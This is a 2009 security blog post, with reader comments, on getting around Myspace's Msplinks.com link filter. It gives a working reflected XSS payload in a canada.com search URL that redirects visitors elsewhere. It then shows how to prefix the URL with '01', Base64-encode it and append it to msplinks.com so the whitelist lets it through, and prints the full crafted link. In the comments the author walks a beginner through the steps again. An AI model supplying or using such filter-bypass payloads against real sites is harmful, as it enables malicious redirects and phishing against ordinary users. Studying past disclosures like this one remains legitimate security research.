This site is soon to be deprecated by http://www.johnleitch.net

Sunday, October 4, 2009

Bypassing Msplinks.com Revisited - Myspace.com

The technique I previously blogged about still works, but ytmnd.com has fixed the XSS vulnerability used in that posting. Here's a hole in another Msplinks.com whitelisted site:

http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('

Just as before 01 is prefixed to the XSS redirect URL, then the result is Base64 encoded and appended to http://www.msplinks.com/.

http://www.msplinks.com/MDFodHRwOi8vd3d3LmNhbmFkYS5jb20vc2VhcmNoL3NlYXJjaC5odG1sP3E9Jyl9d2luZG93LmxvY2F0aW9uPSdodHRwOi8vY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuYmxvZ3Nwb3QuY29tLyc7eygn

5 comments:

  1. If you could tell us noobs what you said, then I'd be happy.

    ReplyDelete
  2. Sure thing. What are you hung up on?

    ReplyDelete
  3. " 01 is prefixed to the XSS redirect URL"

    Not really sure what this means, as I'm new to the java world. I've seen how XSS affects sites when scripts are placed into search bars, but to redirect using whitelisted sites, tough.


    " the result is Base64 encoded and appended "

    I'm guessing after encoding we add the code to Msplink.com/


    I'm stuck at the first part.

    ReplyDelete
  4. It's pretty simple. In this example you would base64 encode 01http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('

    And you have step two correct.

    ReplyDelete
  5. Stadtpalais in Frankfurtinkjet ink cartridges
    I like this post
    although its not studied this but I love writing code and learning of information technology.

    ReplyDelete